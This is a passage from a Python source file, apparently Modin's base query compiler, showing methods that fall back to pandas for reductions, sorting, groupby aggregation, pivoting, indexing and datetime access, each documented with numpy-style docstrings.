**kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.skew)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"standard deviation of the mean\",\n refer_to=\"sem\",\n extra_params=[\"skipna\", \"ddof\", \"**kwargs\"],\n )\n def sem(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.sem)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"standard deviation\",\n refer_to=\"std\",\n extra_params=[\"skipna\", \"ddof\", \"**kwargs\"],\n )\n def std(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.std)(self, **kwargs)\n\n @doc_utils.doc_reduce_agg(\n method=\"variance\", refer_to=\"var\", extra_params=[\"skipna\", \"ddof\", \"**kwargs\"]\n )\n def var(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.var)(self, **kwargs)\n\n # END Abstract column/row partitions reduce operations\n\n # Abstract column/row partitions reduce operations over select indices\n #\n # These operations result in a reduced dimensionality of data.\n # Currently, this means a Pandas Series will be returned, but in the future\n # we will implement a Distributed Series, and this will be returned\n # instead.\n @doc_utils.add_refer_to(\"DataFrame.describe\")\n def describe(self, **kwargs): # noqa: PR02\n \"\"\"\n Generate descriptive statistics.\n\n Parameters\n ----------\n percentiles : list-like\n include : \"all\" or list of dtypes, optional\n exclude : list of dtypes, optional\n datetime_is_numeric : bool\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler object containing the descriptive statistics\n of the underlying data.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.describe)(self, **kwargs)\n\n # END Abstract column/row partitions reduce operations over select indices\n\n # Map across rows/columns\n # These operations require some global knowledge of the full column/row\n # that is being operated on. This means that we have to put all of that\n # data in the same place.\n\n @doc_utils.doc_cum_agg(method=\"sum\", refer_to=\"cumsum\")\n def cumsum(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.cumsum)(self, **kwargs)\n\n @doc_utils.doc_cum_agg(method=\"maximum\", refer_to=\"cummax\")\n def cummax(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.cummax)(self, **kwargs)\n\n @doc_utils.doc_cum_agg(method=\"minimum\", refer_to=\"cummin\")\n def cummin(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.cummin)(self, **kwargs)\n\n @doc_utils.doc_cum_agg(method=\"product\", refer_to=\"cumprod\")\n def cumprod(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.cumprod)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.diff\")\n def diff(self, **kwargs): # noqa: PR02\n \"\"\"\n First discrete difference of element.\n\n Parameters\n ----------\n periods : int\n axis : {0, 1}\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler of the same shape as `self`, where each element is the difference\n between the corresponding value and the previous value in this row or column.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.diff)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.dropna\")\n def dropna(self, **kwargs): # noqa: PR02\n \"\"\"\n Remove missing values.\n\n Parameters\n ----------\n axis : {0, 1}\n how : {\"any\", \"all\"}\n thresh : int, optional\n subset : list of labels\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with null values dropped along given axis.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.dropna)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.nlargest\")\n def nlargest(self, n=5, columns=None, keep=\"first\"):\n \"\"\"\n Return the first `n` rows ordered by `columns` in descending order.\n\n Parameters\n ----------\n n : int, default: 5\n columns : list of labels, optional\n Column labels to order by.\n (note: this parameter can be omitted only for a single-column query compilers\n representing Series object, otherwise `columns` has to be specified).\n keep : {\"first\", \"last\", \"all\"}, default: \"first\"\n\n Returns\n -------\n BaseQueryCompiler\n \"\"\"\n if columns is None:\n return SeriesDefault.register(pandas.Series.nlargest)(self, n=n, keep=keep)\n else:\n return DataFrameDefault.register(pandas.DataFrame.nlargest)(\n self, n=n, columns=columns, keep=keep\n )\n\n @doc_utils.add_refer_to(\"DataFrame.nsmallest\")\n def nsmallest(self, n=5, columns=None, keep=\"first\"):\n \"\"\"\n Return the first `n` rows ordered by `columns` in ascending order.\n\n Parameters\n ----------\n n : int, default: 5\n columns : list of labels, optional\n Column labels to order by.\n (note: this parameter can be omitted only for a single-column query compilers\n representing Series object, otherwise `columns` has to be specified).\n keep : {\"first\", \"last\", \"all\"}, default: \"first\"\n\n Returns\n -------\n BaseQueryCompiler\n \"\"\"\n if columns is None:\n return SeriesDefault.register(pandas.Series.nsmallest)(self, n=n, keep=keep)\n else:\n return DataFrameDefault.register(pandas.DataFrame.nsmallest)(\n self, n=n, columns=columns, keep=keep\n )\n\n @doc_utils.add_refer_to(\"DataFrame.eval\")\n def eval(self, expr, **kwargs):\n \"\"\"\n Evaluate string expression on QueryCompiler columns.\n\n Parameters\n ----------\n expr : str\n **kwargs : dict\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler containing the result of evaluation.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.eval)(\n self, expr=expr, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.mode\")\n def mode(self, **kwargs): # noqa: PR02\n \"\"\"\n Get the modes for every column or row.\n\n Parameters\n ----------\n axis : {0, 1}\n numeric_only : bool\n dropna : bool\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with modes calculated alogn given axis.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.mode)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.fillna\")\n def fillna(self, **kwargs): # noqa: PR02\n \"\"\"\n Replace NaN values using provided method.\n\n Parameters\n ----------\n value : scalar or dict\n method : {\"backfill\", \"bfill\", \"pad\", \"ffill\", None}\n axis : {0, 1}\n inplace : {False}\n This parameter serves the compatibility purpose. Always has to be False.\n limit : int, optional\n downcast : dict, optional\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with all null values filled.\n \"\"\"\n squeeze_self = kwargs.pop(\"squeeze_self\", False)\n squeeze_value = kwargs.pop(\"squeeze_value\", False)\n\n def fillna(df, value, **kwargs):\n if squeeze_self:\n df = df.squeeze(axis=1)\n if squeeze_value:\n value = value.squeeze(axis=1)\n return df.fillna(value, **kwargs)\n\n return DataFrameDefault.register(fillna)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.query\")\n def query(self, expr, **kwargs):\n \"\"\"\n Query columns of the QueryCompiler with a boolean expression.\n\n Parameters\n ----------\n expr : str\n **kwargs : dict\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing the rows where the boolean expression is satisfied.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.query)(\n self, expr=expr, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.rank\")\n def rank(self, **kwargs): # noqa: PR02\n \"\"\"\n Compute numerical rank along the specified axis.\n\n By default, equal values are assigned a rank that is the average of the ranks\n of those values, this behaviour can be changed via `method` parameter.\n\n Parameters\n ----------\n axis : {0, 1}\n method : {\"average\", \"min\", \"max\", \"first\", \"dense\"}\n numeric_only : bool\n na_option : {\"keep\", \"top\", \"bottom\"}\n ascending : bool\n pct : bool\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler of the same shape as `self`, where each element is the\n numerical rank of the corresponding value along row or column.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.rank)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.sort_index\")\n def sort_index(self, **kwargs): # noqa: PR02\n \"\"\"\n Sort data by index or column labels.\n\n Parameters\n ----------\n axis : {0, 1}\n level : int, label or list of such\n ascending : bool\n inplace : bool\n kind : {\"quicksort\", \"mergesort\", \"heapsort\"}\n na_position : {\"first\", \"last\"}\n sort_remaining : bool\n ignore_index : bool\n key : callable(pandas.Index) -> pandas.Index, optional\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing the data sorted by columns or indices.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.sort_index)(self, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.melt\")\n def melt(self, *args, **kwargs): # noqa: PR02\n \"\"\"\n Unpivot QueryCompiler data from wide to long format.\n\n Parameters\n ----------\n id_vars : list of labels, optional\n value_vars : list of labels, optional\n var_name : label\n value_name : label\n col_level : int or label\n ignore_index : bool\n *args : iterable\n Serves the compatibility purpose. Does not affect the result.\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with unpivoted data.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.melt)(self, *args, **kwargs)\n\n @doc_utils.add_refer_to(\"DataFrame.sort_values\")\n def sort_columns_by_row_values(self, rows, ascending=True, **kwargs): # noqa: PR02\n \"\"\"\n Reorder the columns based on the lexicographic order of the given rows.\n\n Parameters\n ----------\n rows : label or list of labels\n The row or rows to sort by.\n ascending : bool, default: True\n Sort in ascending order (True) or descending order (False).\n kind : {\"quicksort\", \"mergesort\", \"heapsort\"}\n na_position : {\"first\", \"last\"}\n ignore_index : bool\n key : callable(pandas.Index) -> pandas.Index, optional\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler that contains result of the sort.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.sort_values)(\n self, by=rows, axis=1, ascending=ascending, **kwargs\n )\n\n @doc_utils.add_refer_to(\"DataFrame.sort_values\")\n def sort_rows_by_column_values(\n self, columns, ascending=True, **kwargs\n ): # noqa: PR02\n \"\"\"\n Reorder the rows based on the lexicographic order of the given columns.\n\n Parameters\n ----------\n columns : label or list of labels\n The column or columns to sort by.\n ascending : bool, default: True\n Sort in ascending order (True) or descending order (False).\n kind : {\"quicksort\", \"mergesort\", \"heapsort\"}\n na_position : {\"first\", \"last\"}\n ignore_index : bool\n key : callable(pandas.Index) -> pandas.Index, optional\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler that contains result of the sort.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.sort_values)(\n self, by=columns, axis=0, ascending=ascending, **kwargs\n )\n\n # END Abstract map across rows/columns\n\n # Map across rows/columns\n # These operations require some global knowledge of the full column/row\n # that is being operated on. This means that we have to put all of that\n # data in the same place.\n @doc_utils.doc_reduce_agg(\n method=\"value at the given quantile\",\n refer_to=\"quantile\",\n params=\"\"\"\n q : list-like\n axis : {0, 1}\n numeric_only : bool\n interpolation : {\"linear\", \"lower\", \"higher\", \"midpoint\", \"nearest\"}\"\"\",\n extra_params=[\"**kwargs\"],\n )\n def quantile_for_list_of_values(self, **kwargs): # noqa: PR02\n return DataFrameDefault.register(pandas.DataFrame.quantile)(self, **kwargs)\n\n # END Abstract map across rows/columns\n\n # Abstract __getitem__ methods\n def getitem_array(self, key):\n \"\"\"\n Mask QueryCompiler with `key`.\n\n Parameters\n ----------\n key : BaseQueryCompiler, np.ndarray or list of column labels\n Boolean mask represented by QueryCompiler or ``np.ndarray`` of the same\n shape as `self`, or enumerable of columns to pick.\n\n Returns\n -------\n BaseQueryCompiler\n New masked QueryCompiler.\n \"\"\"\n\n def getitem_array(df, key):\n return df[key]\n\n return DataFrameDefault.register(getitem_array)(self, key)\n\n def getitem_column_array(self, key, numeric=False):\n \"\"\"\n Get column data for target labels.\n\n Parameters\n ----------\n key : list-like\n Target labels by which to retrieve data.\n numeric : bool, default: False\n Whether or not the key passed in represents the numeric index\n or the named index.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler that contains specified columns.\n \"\"\"\n\n def get_column(df, key):\n if numeric:\n return df.iloc[:, key]\n else:\n return df[key]\n\n return DataFrameDefault.register(get_column)(self, key=key)\n\n def getitem_row_array(self, key):\n \"\"\"\n Get row data for target indices.\n\n Parameters\n ----------\n key : list-like\n Numeric indices of the rows to pick.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler that contains specified rows.\n \"\"\"\n\n def get_row(df, key):\n return df.iloc[key]\n\n return DataFrameDefault.register(get_row)(self, key=key)\n\n # END Abstract __getitem__ methods\n\n # Abstract insert\n # This method changes the shape of the resulting data. In Pandas, this\n # operation is always inplace, but this object is immutable, so we just\n # return a new one from here and let the front end handle the inplace\n # update.\n def insert(self, loc, column, value):\n \"\"\"\n Insert new column.\n\n Parameters\n ----------\n loc : int\n Insertion position.\n column : label\n Label of the new column.\n value : One-column BaseQueryCompiler, 1D array or scalar\n Data to fill new column with.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler with new column inserted.\n \"\"\"\n\n def inserter(df, loc, column, value):\n if isinstance(value, pandas.DataFrame):\n value = value.squeeze(axis=1)\n df.insert(loc, column, value)\n return df\n\n return DataFrameDefault.register(inserter)(\n self, loc=loc, column=column, value=value\n )\n\n # END Abstract insert\n\n # Abstract drop\n def drop(self, index=None, columns=None):\n \"\"\"\n Drop specified rows or columns.\n\n Parameters\n ----------\n index : list of labels, optional\n Labels of rows to drop.\n columns : list of labels, optional\n Labels of columns to drop.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with removed data.\n \"\"\"\n if index is None and columns is None:\n return self\n else:\n return DataFrameDefault.register(pandas.DataFrame.drop)(\n self, index=index, columns=columns\n )\n\n # END drop\n\n # UDF (apply and agg) methods\n # There is a wide range of behaviors that are supported, so a lot of the\n # logic can get a bit convoluted.\n def apply(self, func, axis, *args, **kwargs):\n \"\"\"\n Apply passed function across given axis.\n\n Parameters\n ----------\n func : callable(pandas.Series) -> scalar, str, list or dict of such\n The function to apply to each column or row.\n axis : {0, 1}\n Target axis to apply the function along.\n 0 is for index, 1 is for columns.\n *args : iterable\n Positional arguments to pass to `func`.\n **kwargs : dict\n Keyword arguments to pass to `func`.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler that contains the results of execution and is built by\n the following rules:\n\n - Labels of specified axis are the passed functions names.\n - Labels of the opposite axis are preserved.\n - Each element is the result of execution of `func` against\n corresponding row/column.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.apply)(\n self, func=func, axis=axis, *args, **kwargs\n )\n\n # END UDF\n\n # Manual Partitioning methods (e.g. merge, groupby)\n # These methods require some sort of manual partitioning due to their\n # nature. They require certain data to exist on the same partition, and\n # after the shuffle, there should be only a local map required.\n\n # FIXME: `map_args` and `reduce_args` leaked there from `PandasQueryCompiler.groupby_*`,\n # pandas backend implements groupby via MapReduce approach, but for other backends these\n # parameters make no sense, they shouldn't be present in a base class.\n\n @doc_utils.doc_groupby_method(\n action=\"count non-null values\",\n result=\"number of non-null values\",\n refer_to=\"count\",\n )\n def groupby_count(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.count)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n )\n\n @doc_utils.doc_groupby_method(\n action=\"check whether any element is True\",\n result=\"boolean of whether there is any element which is True\",\n refer_to=\"any\",\n )\n def groupby_any(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.any)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n )\n\n @doc_utils.doc_groupby_method(\n action=\"get the minimum value\", result=\"minimum value\", refer_to=\"min\"\n )\n def groupby_min(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.min)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n )\n\n @doc_utils.doc_groupby_method(result=\"product\", refer_to=\"prod\")\n def groupby_prod(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.prod)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n )\n\n @doc_utils.doc_groupby_method(\n action=\"get the maximum value\", result=\"maximum value\", refer_to=\"max\"\n )\n def groupby_max(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.max)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n )\n\n @doc_utils.doc_groupby_method(\n action=\"check whether all elements are True\",\n result=\"boolean of whether all elements are True\",\n refer_to=\"all\",\n )\n def groupby_all(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.all)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n )\n\n @doc_utils.doc_groupby_method(result=\"sum\", refer_to=\"sum\")\n def groupby_sum(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.sum)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n )\n\n @doc_utils.doc_groupby_method(\n action=\"get the number of elements\",\n result=\"number of elements\",\n refer_to=\"size\",\n )\n def groupby_size(\n self,\n by,\n axis,\n groupby_args,\n map_args,\n reduce_args=None,\n numeric_only=True,\n drop=False,\n ):\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.size)(\n self,\n by=by,\n axis=axis,\n groupby_args=groupby_args,\n map_args=map_args,\n reduce_args=reduce_args,\n numeric_only=numeric_only,\n drop=drop,\n method=\"size\",\n )\n\n @doc_utils.add_refer_to(\"GroupBy.aggregate\")\n def groupby_agg(\n self,\n by,\n is_multi_by,\n axis,\n agg_func,\n agg_args,\n agg_kwargs,\n groupby_kwargs,\n drop=False,\n ):\n \"\"\"\n Group QueryCompiler data and apply passed aggregation function.\n\n Parameters\n ----------\n by : BaseQueryCompiler, column or index label, Grouper or list of such\n Object that determine groups.\n is_multi_by : bool\n If `by` is a QueryCompiler or list of such indicates whether it's\n grouping on multiple columns/rows.\n axis : {0, 1}\n Axis to group and apply aggregation function along.\n 0 is for index, when 1 is for columns.\n agg_func : dict or callable(DataFrameGroupBy) -> DataFrame\n Function to apply to the GroupBy object.\n agg_args : dict\n Positional arguments to pass to the `agg_func`.\n agg_kwargs : dict\n Key arguments to pass to the `agg_func`.\n groupby_kwargs : dict\n GroupBy parameters as expected by ``modin.pandas.DataFrame.groupby`` signature.\n drop : bool, default: False\n If `by` is a QueryCompiler indicates whether or not by-data came\n from the `self`.\n\n Returns\n -------\n BaseQueryCompiler\n QueryCompiler containing the result of groupby aggregation.\n \"\"\"\n if isinstance(by, type(self)) and len(by.columns) == 1:\n by = by.columns[0] if drop else by.to_pandas().squeeze()\n elif isinstance(by, type(self)):\n by = list(by.columns)\n\n return GroupByDefault.register(pandas.core.groupby.DataFrameGroupBy.aggregate)(\n self,\n by=by,\n is_multi_by=is_multi_by,\n axis=axis,\n agg_func=agg_func,\n groupby_args=groupby_kwargs,\n agg_args=agg_kwargs,\n drop=drop,\n )\n\n # END Manual Partitioning methods\n\n @doc_utils.add_refer_to(\"DataFrame.unstack\")\n def unstack(self, level, fill_value):\n \"\"\"\n Pivot a level of the (necessarily hierarchical) index labels.\n\n Parameters\n ----------\n level : int or label\n fill_value : scalar or dict\n\n Returns\n -------\n BaseQueryCompiler\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.unstack)(\n self, level=level, fill_value=fill_value\n )\n\n @doc_utils.add_refer_to(\"DataFrame.pivot\")\n def pivot(self, index, columns, values):\n \"\"\"\n Produce pivot table based on column values.\n\n Parameters\n ----------\n index : label or list of such, pandas.Index, optional\n columns : label or list of such\n values : label or list of such, optional\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler containing pivot table.\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.pivot)(\n self, index=index, columns=columns, values=values\n )\n\n @doc_utils.add_refer_to(\"DataFrame.pivot_table\")\n def pivot_table(\n self,\n index,\n values,\n columns,\n aggfunc,\n fill_value,\n margins,\n dropna,\n margins_name,\n observed,\n sort,\n ):\n \"\"\"\n Create a spreadsheet-style pivot table from underlying data.\n\n Parameters\n ----------\n index : label, pandas.Grouper, array or list of such\n values : label, optional\n columns : column, pandas.Grouper, array or list of such\n aggfunc : callable(pandas.Series) -> scalar, dict of list of such\n fill_value : scalar, optional\n margins : bool\n dropna : bool\n margins_name : str\n observed : bool\n sort : bool\n\n Returns\n -------\n BaseQueryCompiler\n \"\"\"\n return DataFrameDefault.register(pandas.DataFrame.pivot_table)(\n self,\n index=index,\n values=values,\n columns=columns,\n aggfunc=aggfunc,\n fill_value=fill_value,\n margins=margins,\n dropna=dropna,\n margins_name=margins_name,\n observed=observed,\n sort=sort,\n )\n\n @doc_utils.add_refer_to(\"get_dummies\")\n def get_dummies(self, columns, **kwargs): # noqa: PR02\n \"\"\"\n Convert categorical variables to dummy variables for certain columns.\n\n Parameters\n ----------\n columns : label or list of such\n Columns to convert.\n prefix : str or list of such\n prefix_sep : str\n dummy_na : bool\n drop_first : bool\n dtype : dtype\n **kwargs : dict\n Serves the compatibility purpose. Does not affect the result.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with categorical variables converted to dummy.\n \"\"\"\n\n def get_dummies(df, columns, **kwargs):\n return pandas.get_dummies(df, columns=columns, **kwargs)\n\n return DataFrameDefault.register(get_dummies)(self, columns=columns, **kwargs)\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.repeat\")\n def repeat(self, repeats):\n \"\"\"\n Repeat each element of one-column QueryCompiler given number of times.\n\n Parameters\n ----------\n repeats : int or array of ints\n The number of repetitions for each element. This should be a\n non-negative integer. Repeating 0 times will return an empty\n QueryCompiler.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with repeated elements.\n \"\"\"\n return SeriesDefault.register(pandas.Series.repeat)(self, repeats=repeats)\n\n # Indexing\n\n index = property(_get_axis(0), _set_axis(0))\n columns = property(_get_axis(1), _set_axis(1))\n\n def get_axis(self, axis):\n \"\"\"\n Return index labels of the specified axis.\n\n Parameters\n ----------\n axis : {0, 1}\n Axis to return labels on.\n 0 is for index, when 1 is for columns.\n\n Returns\n -------\n pandas.Index\n \"\"\"\n return self.index if axis == 0 else self.columns\n\n def view(self, index=None, columns=None):\n \"\"\"\n Mask QueryCompiler with passed keys.\n\n Parameters\n ----------\n index : list of ints, optional\n Positional indices of rows to grab.\n columns : list of ints, optional\n Positional indices of columns to grab.\n\n Returns\n -------\n BaseQueryCompiler\n New masked QueryCompiler.\n \"\"\"\n index = [] if index is None else index\n columns = [] if columns is None else columns\n\n def applyier(df):\n return df.iloc[index, columns]\n\n return DataFrameDefault.register(applyier)(self)\n\n def insert_item(self, axis, loc, value, how=\"inner\", replace=False):\n \"\"\"\n Insert rows/columns defined by `value` at the specified position.\n\n If frames are not aligned along specified axis, perform frames alignment first.\n\n Parameters\n ----------\n axis : {0, 1}\n Axis to insert along. 0 means insert rows, when 1 means insert columns.\n loc : int\n Position to insert `value`.\n value : BaseQueryCompiler\n Rows/columns to insert.\n how : {\"inner\", \"outer\", \"left\", \"right\"}, default: \"inner\"\n Type of join that will be used if frames are not aligned.\n replace : bool, default: False\n Whether to insert item after column/row at `loc-th` position or to replace\n it by `value`.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with inserted values.\n \"\"\"\n assert isinstance(value, type(self))\n\n def mask(idx):\n if len(idx) == len(self.get_axis(axis)):\n return self\n return (\n self.getitem_column_array(idx, numeric=True)\n if axis\n else self.getitem_row_array(idx)\n )\n\n if 0 <= loc < len(self.get_axis(axis)):\n first_mask = mask(list(range(loc)))\n second_mask_loc = loc + 1 if replace else loc\n second_mask = mask(list(range(second_mask_loc, len(self.get_axis(axis)))))\n return first_mask.concat(axis, [value, second_mask], join=how, sort=False)\n else:\n return self.concat(axis, [value], join=how, sort=False)\n\n def setitem(self, axis, key, value):\n \"\"\"\n Set the row/column defined by `key` to the `value` provided.\n\n Parameters\n ----------\n axis : {0, 1}\n Axis to set `value` along. 0 means set row, 1 means set column.\n key : label\n Row/column label to set `value` in.\n value : BaseQueryCompiler, list-like or scalar\n Define new row/column value.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with updated `key` value.\n \"\"\"\n\n def setitem(df, axis, key, value):\n if is_scalar(key) and isinstance(value, pandas.DataFrame):\n value = value.squeeze()\n if not axis:\n df[key] = value\n else:\n df.loc[key] = value\n return df\n\n return DataFrameDefault.register(setitem)(self, axis=axis, key=key, value=value)\n\n def write_items(self, row_numeric_index, col_numeric_index, broadcasted_items):\n \"\"\"\n Update QueryCompiler elements at the specified positions by passed values.\n\n In contrast to ``setitem`` this method allows to do 2D assignments.\n\n Parameters\n ----------\n row_numeric_index : list of ints\n Row positions to write value.\n col_numeric_index : list of ints\n Column positions to write value.\n broadcasted_items : 2D-array\n Values to write. Have to be same size as defined by `row_numeric_index`\n and `col_numeric_index`.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler with updated values.\n \"\"\"\n\n def write_items(df, broadcasted_items):\n if isinstance(df.iloc[row_numeric_index, col_numeric_index], pandas.Series):\n broadcasted_items = broadcasted_items.squeeze()\n df.iloc[\n list(row_numeric_index), list(col_numeric_index)\n ] = broadcasted_items\n return df\n\n return DataFrameDefault.register(write_items)(\n self, broadcasted_items=broadcasted_items\n )\n\n # END Abstract methods for QueryCompiler\n\n @property\n def __constructor__(self):\n \"\"\"\n Get query compiler constructor.\n\n By default, constructor method will invoke an init.\n\n Returns\n -------\n callable\n \"\"\"\n return type(self)\n\n # __delitem__\n # This will change the shape of the resulting data.\n def delitem(self, key):\n \"\"\"\n Drop `key` column.\n\n Parameters\n ----------\n key : label\n Column name to drop.\n\n Returns\n -------\n BaseQueryCompiler\n New QueryCompiler without `key` column.\n \"\"\"\n return self.drop(columns=[key])\n\n # END __delitem__\n\n def has_multiindex(self, axis=0):\n \"\"\"\n Check if specified axis is indexed by MultiIndex.\n\n Parameters\n ----------\n axis : {0, 1}, default: 0\n The axis to check (0 - index, 1 - columns).\n\n Returns\n -------\n bool\n True if index at specified axis is MultiIndex and False otherwise.\n \"\"\"\n if axis == 0:\n return isinstance(self.index, pandas.MultiIndex)\n assert axis == 1\n return isinstance(self.columns, pandas.MultiIndex)\n\n def get_index_name(self, axis=0):\n \"\"\"\n Get index name of specified axis.\n\n Parameters\n ----------\n axis : {0, 1}, default: 0\n Axis to get index name on.\n\n Returns\n -------\n hashable\n Index name, None for MultiIndex.\n \"\"\"\n return self.get_axis(axis).name\n\n def set_index_name(self, name, axis=0):\n \"\"\"\n Set index name for the specified axis.\n\n Parameters\n ----------\n name : hashable\n New index name.\n axis : {0, 1}, default: 0\n Axis to set name along.\n \"\"\"\n self.get_axis(axis).name = name\n\n def get_index_names(self, axis=0):\n \"\"\"\n Get index names of specified axis.\n\n Parameters\n ----------\n axis : {0, 1}, default: 0\n Axis to get index names on.\n\n Returns\n -------\n list\n Index names.\n \"\"\"\n return self.get_axis(axis).names\n\n def set_index_names(self, names, axis=0):\n \"\"\"\n Set index names for the specified axis.\n\n Parameters\n ----------\n names : list\n New index names.\n axis : {0, 1}, default: 0\n Axis to set names along.\n \"\"\"\n self.get_axis(axis).names = names\n\n # DateTime methods\n\n @doc_utils.doc_dt_round(refer_to=\"ceil\")\n def dt_ceil(self, freq, ambiguous=\"raise\", nonexistent=\"raise\"):\n return DateTimeDefault.register(pandas.Series.dt.ceil)(\n self, freq, ambiguous, nonexistent\n )\n\n @doc_utils.add_one_column_warning\n @doc_utils.add_refer_to(\"Series.dt.components\")\n def dt_components(self):\n \"\"\"\n Spread each date-time value into its components (days, hours, minutes...).\n\n Returns\n -------\n BaseQueryCompiler\n \"\"\"\n return DateTimeDefault.register(pandas.Series.dt.components)(self)\n\n @doc_utils.doc_dt_timestamp(\n prop=\"the date without timezone information\", refer_to=\"date\"\n )\n def dt_date(self):\n return DateTimeDefault.register(pandas.Series.dt.date)(self)\n\n @doc_utils.doc_dt_timestamp(prop=\"day component\", refer_to=\"day\")\n def dt_day(self):\n return DateTimeDefault.register(pandas.Series.dt.day)(self)\n\n 